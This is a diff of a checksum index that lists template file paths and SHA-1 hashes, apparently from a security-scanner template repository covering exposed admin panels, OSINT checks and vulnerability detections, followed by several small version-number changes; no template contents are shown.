-http/exposed-panels/axway-securetransport-panel.yaml:a7a397c0ed73ffee9f98372cc3ccbaee86ff6463
-http/exposed-panels/axway-securetransport-webclient.yaml:fbd2c65383292c44f968682fef7a42891eb1283d
+http/exposed-panels/axway-securetransport-panel.yaml:711a0d62f0e564488e021331b3753d9a12249f1e
+http/exposed-panels/axway-securetransport-webclient.yaml:1d264f2d7991022eb3e70635853df89c2e7b130a
 http/exposed-panels/azkaban-web-client.yaml:d29e882e15f688e116816a51bdf350eeebe6f86a
 http/exposed-panels/backpack/backpack-admin-panel.yaml:ab78ec5e2ecff92c8df96cf38e0f1c34cb75d6ac
 http/exposed-panels/barracuda-panel.yaml:a8a5e4c7f8328d89f21ab079e46dccb4b01d2f77
@ -2377,7 +2382,7 @@ http/exposed-panels/camunda-login-panel.yaml:8a36d6700d2d2613797e1e3ff6eb90f1e66
 http/exposed-panels/cas-login.yaml:57f30b0ee83a80290926f748ddd69f142fe17be9
 http/exposed-panels/casdoor-login.yaml:9b079094b0408a2a040e6fefcaf216525110328a
 http/exposed-panels/casemanager-panel.yaml:649993806e91737558195f584af9804cb83b5a93
-http/exposed-panels/caton-network-manager-system.yaml:9561921837ea4e657868d2bff93755677d56949c
+http/exposed-panels/caton-network-manager-system.yaml:4560d7cfab4c8bad6b9b06df3cda7accd99b27f3
 http/exposed-panels/ccm-detect.yaml:1fc05e835cb3e6b62f3671fe1475b6e961825e93
 http/exposed-panels/centreon-panel.yaml:a801d4b8643d42f94a0a492e508421424ba3a267
 http/exposed-panels/cerebro-panel.yaml:c85b15f82f76e9d2316f179f9300f34f2d60cc61
@ -2429,7 +2434,7 @@ http/exposed-panels/cortex-xsoar-login.yaml:b6262dfac65f9566df2faf77c74d81fdf6da
 http/exposed-panels/couchdb-exposure.yaml:41aa4bfe3d93a02c64a965e9af0a3c512f712690
 http/exposed-panels/couchdb-fauxton.yaml:d168286d1180279aca0e2c5f30adf08c390c8a6e
 http/exposed-panels/cpanel-api-codes.yaml:9127bd64cbe0d4d14ca79dae29e9807ed8e77dcb
-http/exposed-panels/craftcms-admin-panel.yaml:c4c52fbd234c44baa722bc79b58b8f0dd545e0cf
+http/exposed-panels/craftcms-admin-panel.yaml:fc9b2b0a191c82b4ab3011210f56af903e793f48
 http/exposed-panels/creatio-login-panel.yaml:49ef924029a0343113f934479057ac2944715308
 http/exposed-panels/crush-ftp-login.yaml:74c85aa382a97d5f1b56b906e3b7f20d1cd2c6c7
 http/exposed-panels/crxde-lite.yaml:a3999c0c15e5aeea0e02399250bf1b4e11dced9c
@ -2468,8 +2473,8 @@ http/exposed-panels/druid-console-exposure.yaml:42bd16021b800ca4363f9c973a437861
 http/exposed-panels/druid-panel.yaml:d66befa994f210ecb0184b604fc9bba64198fd30
 http/exposed-panels/drupal-login.yaml:bef8a8e4bc387ea39247dfb93d99b2a364662362
 http/exposed-panels/dynamicweb-panel.yaml:473c28f936052a0d997a7c7d35ac89dd562f7480
-http/exposed-panels/dynatrace-panel.yaml:ae953c66123ff9b268a876228f976385fddaa3c8
-http/exposed-panels/dzzoffice/dzzoffice-install.yaml:cb684da1f14cb231f2a01b6cf78603ae4a0e1fd7
+http/exposed-panels/dynatrace-panel.yaml:eb24aaf749a9a78c8872558541682a594527ff37
+http/exposed-panels/dzzoffice/dzzoffice-install.yaml:d6ca209cd73fc31d4c0704b6cd024ded07a7c8e2
 http/exposed-panels/dzzoffice/dzzoffice-panel.yaml:0b1f91113d5dd47a4262a5abe00f0f5bbb3ac3a3
 http/exposed-panels/e-mobile-panel.yaml:5ff543414a04508de2dec8098ac5a68fa756ed6b
 http/exposed-panels/eMerge-panel.yaml:0ee87e8c9c52e0f9806182a9ee6e25b59c2fd199
@ -2477,7 +2482,7 @@ http/exposed-panels/ecosys-command-center.yaml:ecdedf74967790fcfadb5e87bc24a1671
 http/exposed-panels/edgeos-login.yaml:bfad390b4768e58f739b0a293d90f8d0f114732e
 http/exposed-panels/eko-management-console-login.yaml:4c9596741a8f941fd45d6972d9b38cd18db3f653
 http/exposed-panels/eko-software-update-panel.yaml:e6a546c3678116651ed0e55c9a400359aa84b576
-http/exposed-panels/elemiz-network-manager.yaml:31a000c0293af35050bb17505fc36e17614316d8
+http/exposed-panels/elemiz-network-manager.yaml:99dbf8c38488ff26a32dd1dcbdada4d997f19f95
 http/exposed-panels/emby-panel.yaml:b730c98afcc75e9c8c322af0bcb01cf530ea5e47
 http/exposed-panels/emerson-power-panel.yaml:af4c8627b46c910dd074478bc22afdbde49545c8
 http/exposed-panels/emessage-panel.yaml:6110fa04c54c8afcd12d43399961c46c67d6a43f
@ -2491,8 +2496,8 @@ http/exposed-panels/epson-web-control-detect.yaml:4bbd166b4f8900c2080c354a1b42cc
 http/exposed-panels/esphome-panel.yaml:43ce5a2b39c1527be79dbbe646bafe668ed84337
 http/exposed-panels/esxi-system.yaml:db895896efc85e55d75a74ddaddf8e4e44539a88
 http/exposed-panels/eventum-panel.yaml:2d08f2616b411ef4d64f15f9e73a71e7bf9815fa
-http/exposed-panels/ewm-manager-panel.yaml:f648e3d970fcfbbfcdb209ca9e24e35d0e0aa04b
-http/exposed-panels/exagrid-manager-panel.yaml:a1b08f7ac19678a12c7c373c25e335924aaaf123
+http/exposed-panels/ewm-manager-panel.yaml:9bcdde47f4085f233203e2b250acf174977405ad
+http/exposed-panels/exagrid-manager-panel.yaml:971d9920a29b8454dcc0532e161897353874f696
 http/exposed-panels/exolis-engage-panel.yaml:b86572cb023e88f90b808fa237310e844140525f
 http/exposed-panels/exposed-webalizer.yaml:b6a0d9228ac9f90b8a95676f295ea9cb1c1ef533
 http/exposed-panels/extreme-netconfig-ui.yaml:d0ee368ce7daa79747733b134947d7050251037f
@ -2503,8 +2508,8 @@ http/exposed-panels/faraday-login.yaml:7ce3bad180f80ec6dc4e7cea6b9ea8b4be1c0ab4
 http/exposed-panels/fastapi-docs.yaml:7d77868e4dcbdea34994b7df08f8b8c7a16f0066
 http/exposed-panels/fastpanel-hosting-control-panel.yaml:fc78fda73dc96b9621795829f7159b88d17a08f5
 http/exposed-panels/fatpipe-ipvpn-panel.yaml:28041f7ed6635be2e03d38b90629b1246ea8cbf4
-http/exposed-panels/fatpipe-mpvpn-panel.yaml:6e2d3a08a79ede88e3f0eef5459638d142305464
-http/exposed-panels/fatpipe-warp-panel.yaml:16ad648a6e2093c017e50ed403017f49626c777b
+http/exposed-panels/fatpipe-mpvpn-panel.yaml:1ef4e666e33e77b7fddcc90eccd86a22066ee988
+http/exposed-panels/fatpipe-warp-panel.yaml:8f5b94fd538cb1238cef253eb2683cfd5d1e891d
 http/exposed-panels/fiori-launchpad.yaml:d5bd78780e165f59e2f8b6ab56bb92a66ffaa03f
 http/exposed-panels/fiorilaunchpad-logon.yaml:d8f088bbf7bf65f7e32b97ac463fac10046543c9
 http/exposed-panels/fireware-xtm-user-authentication.yaml:1a7da3eec82f43233df89a6b74c657c2a3d165ae
@ -2521,14 +2526,14 @@ http/exposed-panels/forti/fortiadc-panel.yaml:ffacd47e34c592d2609adc0accd8181ab9
 http/exposed-panels/fortinet/fortiap-panel.yaml:b89faddf0c29a9e9a8fefb6031d72f782b383474
 http/exposed-panels/fortinet/fortimail-panel.yaml:af230a1cb5e26c158941d772a5a8dae8badda957
 http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml:847001926ae21a884e70a14d6301bf6d4761e7ab
-http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml:59f0f35212e2bac0a16c75c833bf93d7a363ee7e
-http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml:1d0592895d1457dd478585c989f10d087eee78ac
+http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml:f9f485f454b1e1e567580a3a91a15d5e019e9f10
+http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml:a3454863c0d83701af34ea78670145a9495db692
 http/exposed-panels/fortinet/fortinet-panel.yaml:fd06e5f6af3aa8f7d45a34a721311af424b40e6f
 http/exposed-panels/fortinet/fortios-management-panel.yaml:ef2d2911cf92e71d5d7afe55c1785d70fc1481ba
 http/exposed-panels/fortinet/fortios-panel.yaml:df8f8b3d532545d7fa18d223a7de014c5880179b
 http/exposed-panels/fortinet/fortitester-login-panel.yaml:45de47807695b703951cad07f47400775d94fee3
 http/exposed-panels/fortinet/fortiweb-panel.yaml:ab7f6463e85a5c1955fe86b87f2062d7574f1eae
-http/exposed-panels/freeipa-panel.yaml:44bd90270cec1a20c896dc56ead1d413bd693f91
+http/exposed-panels/freeipa-panel.yaml:55b12b83caf6c49f31559168d0f3a2485943e150
 http/exposed-panels/freepbx-administration-panel.yaml:8ae869dbd5f925f42a160f332a6e1bf68c7ae5b4
 http/exposed-panels/froxlor-management-panel.yaml:776c3b5494bd0d648a679f7f2e75762e3b9627d6
 http/exposed-panels/ftm-manager-panel.yaml:a5092e40d936b64ef45997bee3402d73d1d56a59
@ -2547,7 +2552,7 @@ http/exposed-panels/github-enterprise-detect.yaml:6a73db084afec75d80dae9a6722d9f
 http/exposed-panels/gitlab-detect.yaml:3c927e3db2778e5a0c77fd0acb8f278c49a1782d
 http/exposed-panels/globalprotect-panel.yaml:870dbc6863e2970707642fc0dd0ed557f0d60d2e
 http/exposed-panels/glpi-panel.yaml:040f341a7be99b0fa7e2b8c49642cc10a8972338
-http/exposed-panels/gnu-mailman.yaml:2b504c1d4ef2268d56ac881f9d20887f0d7799a6
+http/exposed-panels/gnu-mailman.yaml:ad2214548ea0ff79b809718b6e1885de893ceef9
 http/exposed-panels/go-anywhere-client.yaml:cc9233de19c9a380ed1b6a391c0f819c713f48f3
 http/exposed-panels/goanywhere-mft-login.yaml:22e0692641b27c7ef8038d4b702c143343932a2d
 http/exposed-panels/gocd-login.yaml:c1238dccdb3f0428c19bb404e7b012ac42d45c5a
@ -2559,16 +2564,16 @@ http/exposed-panels/gradle/gradle-enterprise-panel.yaml:510a69f10f4f281ba3a630bb
 http/exposed-panels/grafana-detect.yaml:e0e9d531594709818813ed143e9ff5689f5bfaa2
 http/exposed-panels/grails-database-admin-console.yaml:52da5cd9dc42cd00e57bddb2b5abe4e86bc24e48
 http/exposed-panels/graphite-browser.yaml:6e139b618efe8c57864c800c932c93551c46e64b
-http/exposed-panels/group-ib-panel.yaml:cc2f877ac14fcad8659d3dfdc15fc4aeab70c6bc
-http/exposed-panels/gryphon-login.yaml:c204d15adfa383b4cee560aa898112cc3b2d8f65
+http/exposed-panels/group-ib-panel.yaml:999f522fe76c5efed669f3067d53ca734d4f296b
+http/exposed-panels/gryphon-login.yaml:531a77ad65025a4d881bf55f81c6f6aa69b00f09
 http/exposed-panels/gyra-master-admin.yaml:39f8fdaaa828781b17e4cf92b39d92f99b3db78a
 http/exposed-panels/h2console-panel.yaml:e17441f53a435db4d6846164ebafd51025e03f3c
 http/exposed-panels/hadoop-exposure.yaml:2b07be5310200e389a2394c69a8e2c0828e75020
 http/exposed-panels/hangfire-dashboard.yaml:b1d3b90c80b778dccdabf7869a402af40ee43c19
 http/exposed-panels/harbor-panel.yaml:20e85b8bbd4593f79f43a5eb3efcf0a9e90b3ec9
-http/exposed-panels/hashicorp-consul-agent.yaml:e74f8b20108d82fe850cbd658a6d68f7cb9eec11
+http/exposed-panels/hashicorp-consul-agent.yaml:eb2f05de9c871ef46a1ee2f470e5c228ec46c475
 http/exposed-panels/hashicorp-consul-webgui.yaml:ef9bbc5476ef8f1f9d6d05240dd3a5440b994923
-http/exposed-panels/hestia-panel.yaml:693ab62474766941ea1264316da011a2a1ea235b
+http/exposed-panels/hestia-panel.yaml:27a494250cfd6f8d57630dd51ff78098c60ddf83
 http/exposed-panels/highmail-admin-panel.yaml:7cc469eac77ca28bf0c4db9c48c450fe81cc3dbb
 http/exposed-panels/hitron-technologies.yaml:3614de80a2f6e3da4257dad8aae28d5a7c936c1f
 http/exposed-panels/hivemanager-login-panel.yaml:8e076b2a170ce9e2b29eba688f31e2d8a7aea0ec
@ -2589,7 +2594,7 @@ http/exposed-panels/huawei-hg532e-panel.yaml:466e7efb61203924e08683765fe58a4b5e8
 http/exposed-panels/hybris-administration-console.yaml:7d1ebe531c1271d4259fe514069967875545d9e0
 http/exposed-panels/hydra-dashboard.yaml:9e0055d0642f2ae85f17e5886de58a955fb58e8f
 http/exposed-panels/hypertest-dashboard.yaml:e3f4b8ee0dec7426968ad6a92516f3ec29822aa8
-http/exposed-panels/i-mscp-panel.yaml:4b35a061bb791494be55ca9716bfa14eef1450ee
+http/exposed-panels/i-mscp-panel.yaml:d004e7f7bb480e42d0dcb6e5e4d9efc78d4e83bb
 http/exposed-panels/ibm/ibm-advanced-system-management.yaml:360a7441e22f7a70bdc27193296ba9f9248acaed
 http/exposed-panels/ibm/ibm-maximo-login.yaml:2f906d43ce693f00c0f7f49b3eae5bdf593f9414
 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:c09cdb27d0faf798e12b5e41b176b2c8642c4947
@ -2623,9 +2628,9 @@ http/exposed-panels/jamf-login.yaml:b8d8f51e8e10b1e65e12f141695a9a99a207871d
 http/exposed-panels/jamf-panel.yaml:a5b1ab765796a1fd2dce512650ca4ee0bf011779
 http/exposed-panels/jamf-setup-assistant.yaml:eb9e428dbb3a1e24a891ce05f6767d48114633a9
 http/exposed-panels/jaspersoft-panel.yaml:f47072a4a3a518570898a6c6bd9ae1efdc8741b9
-http/exposed-panels/jboss/jboss-jbpm-admin.yaml:3832df4de23302f78e2702a3a155fe30af7a31cd
+http/exposed-panels/jboss/jboss-jbpm-admin.yaml:bda3186b481c5b22b45c95cec74e4bd84f147c12
 http/exposed-panels/jboss/jboss-juddi.yaml:adde4aed2d368029e245936f947112008b7d82ad
-http/exposed-panels/jboss/jboss-soa-platform.yaml:cb89ae2bca47862a05157cf628294c69b8b8c79f
+http/exposed-panels/jboss/jboss-soa-platform.yaml:c28b46a6a25647a08ba919937d7f268a2834efdc
 http/exposed-panels/jboss/jmx-console.yaml:2bf6bb0d8576e747a8affbd286b0daf492ab7b61
 http/exposed-panels/jboss/wildfly-panel.yaml:29f69d41f34a4db077632276c3647b5f7b62f81f
 http/exposed-panels/jcms-panel.yaml:ebc42c203282db15030885d692de6b50d1c6c2fc
@ -2646,7 +2651,7 @@ http/exposed-panels/kafka-topics-ui.yaml:d88fe451a8c00c1a4c0b0aa3e0fd576d9c98f16
 http/exposed-panels/kanboard-login.yaml:9a3e30d13041d3f64a265b6c49d1cfecf9ae256a
 http/exposed-panels/kavita-panel-detect.yaml:846032ec717e96452c24fa99ae140db8419eca71
 http/exposed-panels/keenetic-web-login.yaml:16b3d7e1f5bf82cdcb043200bb980f1f239d4f4f
-http/exposed-panels/kenesto-login.yaml:a70f7c7613e96878638848ee4ec8e9e83236989a
+http/exposed-panels/kenesto-login.yaml:d7673d6e644ffe5f497c618c78d3144dfbce5efc
 http/exposed-panels/kentico-login.yaml:bb7713240381ec61e69947579e15e5267a299261
 http/exposed-panels/kerio-connect-client.yaml:b07dbac978e84f81fe95b83b0f240aa77a3a81fe
 http/exposed-panels/kettle-panel.yaml:ab7f0b1fda5320d56d4978c035a80d54d188270a
@ -2656,12 +2661,12 @@ http/exposed-panels/kfm/kfm-login-panel.yaml:190668330c63e3d071752dcf6147bb85bb8
 http/exposed-panels/kibana-panel.yaml:bfe834c612b5ce7d0ed819042411a74bfb17c6e4
 http/exposed-panels/kiwitcms-login.yaml:ba6776cd5451651413457a13b197789da4f49ee3
 http/exposed-panels/kkfileview-panel.yaml:1c946422caf83ed3c80e8be3287e9923848e62d2
-http/exposed-panels/konga-panel.yaml:acdbc52eb17a5bc6c32e78e783bd4684e3329927
-http/exposed-panels/kraken-cluster-monitoring.yaml:75b8df5fb62ddaba41f14fccd599bd4b68f7dad6
+http/exposed-panels/konga-panel.yaml:baac539efc6251d6bfbc78e7436b024600db6941
+http/exposed-panels/kraken-cluster-monitoring.yaml:01e5b2cb3ab004e8f4d04f3624e5a2b557df9613
 http/exposed-panels/kronos-workforce-central.yaml:1ad3584d2f7a9da61748be55e326bda6ea251ca1
 http/exposed-panels/kubernetes-dashboard.yaml:c06e4042dad2fc04f6bd8e5c8ca4c0e92a21dcb8
-http/exposed-panels/kubernetes-enterprise-manager.yaml:b8da4a3aba220fb1250246e3d68e74a7e1078ee3
-http/exposed-panels/kubernetes-mirantis.yaml:dc7b32e687a060c725c3b95dce8484f2a1671caa
+http/exposed-panels/kubernetes-enterprise-manager.yaml:a1a9840cd4b98e52dc147858d7d7bab772831ca5
+http/exposed-panels/kubernetes-mirantis.yaml:ce2a7ac08c2b4426613f99fc01800b143cf905e1
 http/exposed-panels/kubernetes-web-view.yaml:551b594f797d1718dcaa9f86f353ecfcf8acff41
 http/exposed-panels/kubeview-dashboard.yaml:3faabea16411e4afcdd87dc77d074a9ea2d9bdd5
 http/exposed-panels/labkey-server-login.yaml:687b491da2399540da5097a8bfb3c6cc71a2eecb
@ -2694,15 +2699,15 @@ http/exposed-panels/maestro-login-panel.yaml:08c4247ee711f2d4252312cd0510ae738ae
 http/exposed-panels/mag-dashboard-panel.yaml:2ed5adb630ccf5ca3a677ac5e33d46edae7a7222
 http/exposed-panels/magento-admin-panel.yaml:10d98b5e301e28a42896dbb4bf5e14ec01c3d145
 http/exposed-panels/magento-downloader-panel.yaml:7f337fb837e46507830fe19ce5c3d22925de10c3
-http/exposed-panels/magnolia-panel.yaml:b18ca9e60edcba53e1522bd896c82558a08088ae
+http/exposed-panels/magnolia-panel.yaml:12556bdacb5f09220e6c707f225c9b6526ca044b
 http/exposed-panels/mailhog-panel.yaml:00f5ec9ad82779c2754167e8d8d255f76188b3b5
 http/exposed-panels/mailwatch-login.yaml:a09bcdb848c46c2cf5703fd2d31a22c94303bdb2
 http/exposed-panels/mantisbt-panel.yaml:1e7321cf45a66126390fd184fa82e51a1cb7f1d9
 http/exposed-panels/matomo-login-portal.yaml:acb4d95b0c88b60f64de57505b09799038d06f5f
-http/exposed-panels/mautic-crm-panel.yaml:6068d03d61bfea975cd479ec415d1e4f17428541
+http/exposed-panels/mautic-crm-panel.yaml:48a9328f1337af44a2858317465ca1bc807e176e
 http/exposed-panels/meshcentral-login.yaml:8d3f8e6d225d12bce92b4ff0d2d565a5f4f1fd7c
 http/exposed-panels/metabase-panel.yaml:e4930673f024691fdacb0754b7294b1c66078014
-http/exposed-panels/metasploit-setup-page.yaml:d9e7f6cf7284be640225ae2baa839ab6a9281d35
+http/exposed-panels/metasploit-setup-page.yaml:0c148041bf8d65a77abda8a07f21e43295c90302
 http/exposed-panels/metersphere-login.yaml:3c9d427f7671ab6a7f5befd8d715db03c8ba2201
 http/exposed-panels/mfiles-web-detect.yaml:bfe40c0a0004a68aeabe0c4c1701ae29e1c57dcf
 http/exposed-panels/microfocus-admin-server.yaml:b07ddd6065c72bd7d35c9bf40fa8c6f27b70a1e6
@ -2755,7 +2760,7 @@ http/exposed-panels/nginx-proxy-manager.yaml:46c72fd5085fa4a3fca5bef7da1771c7305
 http/exposed-panels/nginx-ui-dashboard.yaml:c56daf8ea97037ea90e9c6e19869ada77c83a4c6
 http/exposed-panels/noescape-login.yaml:1e7995aef174b02d1707f34d3c0aec6dad58908c
 http/exposed-panels/nordex-wind-farm-portal.yaml:a2d328c67786f06001730f61738eac3a5c61ff82
-http/exposed-panels/normhost-backup-server-manager.yaml:05007f057b9cff53485a89fed424936e3f31721c
+http/exposed-panels/normhost-backup-server-manager.yaml:96bf2d3a33ceafce21f9afeb43cc36edade64624
 http/exposed-panels/novnc-login-panel.yaml:5f180e26988b80138ff4ac09129f639fc3b5bdbd
 http/exposed-panels/nozomi-panel.yaml:67c429aa103123d37d0f10d1cca884c013e1074d
 http/exposed-panels/np-data-cache.yaml:b8fb2b07da34b0fa2646dadb061a8086eba8bbc7
@ -2764,7 +2769,7 @@ http/exposed-panels/nsq-admin-panel.yaml:a922f35bd24ce03533c0577df1cb0edcd470b70
 http/exposed-panels/nutanix-web-console-login.yaml:bfe7ee184943e5f66d7e71073dd6f851a3ae8819
 http/exposed-panels/nuxeo-platform-panel.yaml:df6605e933cc389eb1030d56814669b9e0f9415e
 http/exposed-panels/nzbget-panel.yaml:bfa43fa83fadce83e57f0902610f61affc4985dc
-http/exposed-panels/o2-easy-panel.yaml:21793340a4c0d9e02d14671ccc229031437e6ef5
+http/exposed-panels/o2-easy-panel.yaml:e5cc728e82802503f9a5bef7950bb0fee18641c2
 http/exposed-panels/ocomon-panel.yaml:812538054db1e77c7979ff07649bf3b2de530396
 http/exposed-panels/ocs-inventory-login.yaml:7f6ebc8d598d74659dc2ef23ddb6a36c2825816f
 http/exposed-panels/octoprint-login.yaml:897ce4d84684617a9e5fabcf35b1c77eed649ffe
@ -2784,11 +2789,11 @@ http/exposed-panels/openbmcs-detect.yaml:1250c6737debfad747742a47218791dfb5940f1
 http/exposed-panels/opencart-panel.yaml:a6167ab687b27c3aad345f214e579f7d1f633c17
 http/exposed-panels/opencast-detect.yaml:3fd2ac7c8865df710f08364f98ac0c8c7f99a51c
 http/exposed-panels/opencats-panel.yaml:0a2c447c8040b1da8cfa454e4fa81c80bc5da418
-http/exposed-panels/opencpu-panel.yaml:99bcee7cff2df0d3c34d6a123b1061d10dcaf7f9
+http/exposed-panels/opencpu-panel.yaml:071812641ce7cde7efb88ec00153e012db0b77fc
 http/exposed-panels/openemr-detect.yaml:a9b54f547587a4598858151841889f1e5da6237b
 http/exposed-panels/openerp-database.yaml:121258fa36ee7c70165256073b4fd6efdce8f820
 http/exposed-panels/openfire-admin-panel.yaml:b98206369fda6f3e1c8ae9541e894a32fcd83d6a
-http/exposed-panels/opengear-panel.yaml:48676bffca5fa3d18169c00e0b73241ad7393236
+http/exposed-panels/opengear-panel.yaml:071b6b2512d5f6cf748f887b8735510c702236b9
 http/exposed-panels/opennebula-panel.yaml:d180bb0777ac3d93ce18f8bebb990f6be239401b
 http/exposed-panels/opennms-web-console.yaml:8481a3612b51003ff3efb40328ed2c7b37771949
 http/exposed-panels/opensis-panel.yaml:2f748753e65705d8dc1441663fd98d6bfdf2742b
@ -4331,6 +4336,7 @@ http/osint/lowcygierpl.yaml:4e7fc4faedfa15d75130b397012f3484bddc07f0
 http/osint/maga-chat.yaml:6401982e00fe6642f4c143848c170617def17fe1
 http/osint/magabook.yaml:02b59e806ec357f442bb366c89f13ea3a19d5e78
 http/osint/magix.yaml:b715afacdb72673e3550d611acaf46dcc54d7e5d
+http/osint/mail-archive.yaml:763245c83cb57ecc14239c10acd37dfa17e163c4
 http/osint/manyvids.yaml:f952aab731545ad037c48196357d1548546e62ce
 http/osint/mapmytracks.yaml:ab9022c4f57910fd95c63b3c22c8cc87e03807d9
 http/osint/mapstodonspace-mastodon-instance.yaml:438d814c616719b927aa041090b4c9b108ad4e4f
@ -5533,6 +5539,7 @@ http/token-spray/google-streetview.yaml:29a4e69dc1d7b6cf3f04cc787c95168ddcd69880
 http/token-spray/google-timezone.yaml:c4d30319b868ab7a6e96590bac5b058029c66cff
 http/token-spray/googlet-extsearchplaces.yaml:0ee2bb703c3ab767c5bf9e9e259d5837babe93bc
 http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml:33e23c922123a2694abedc6a9eec080e4032a723
+http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:5d109c796c88f3a8db6d41f5f0a2acbedb969632
 http/vulnerabilities/apache/apache-flink-unauth-rce.yaml:a01c17a1280778c1e55f62676c451fbbaf070467
 http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:78265d05e2b10e1a4519012da361ee3c31bbbfdf
 http/vulnerabilities/apache/apache-solr-file-read.yaml:38dd7bfc0afb10f96b6010c8d8abc43b1df2f6a7
@ -6186,7 +6193,7 @@ ssl/ssl-dns-names.yaml:0ee89b82598260102f00508deb0354877457ac5a
 ssl/tls-version.yaml:defb1b1c7294c0a57b98020dba74e0b0fce07d31
 ssl/untrusted-root-certificate.yaml:9d87c84523725b319ebf63e798085b7ec7c0e5b8
 ssl/weak-cipher-suites.yaml:77401e59fadeae66c229c7a0c0ea7ac94178dd7c
-templates-checksum.txt:8b82a160cf6dcf5eb942a37881f56edcce1b49ff
+templates-checksum.txt:e0128782719c2815c981bb4ad4263c221b36d696
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
 @ -1 +1 @@
 .3.5.1
 .3.6.1
 @ -1 +1 @@
 .0.8
 .0.9
 @ -1 +1 @@
 .0.34
 .0.36
 @ -1 +1 @@
 .7.8
 .7.9
 @ -1 +1 @@
 .2.4
 .2.5
 @ -1 +1 @@
 .6.9
 .7.0
 @ -1 +1 @@
 .4.8
 .4.9
 @ -1 +1 @@
 .9.53
 .9.54
 @ -1 +1 @@
 .4.1
 .4.3
 @ -1 +1 @@
 .5.0
 .5.1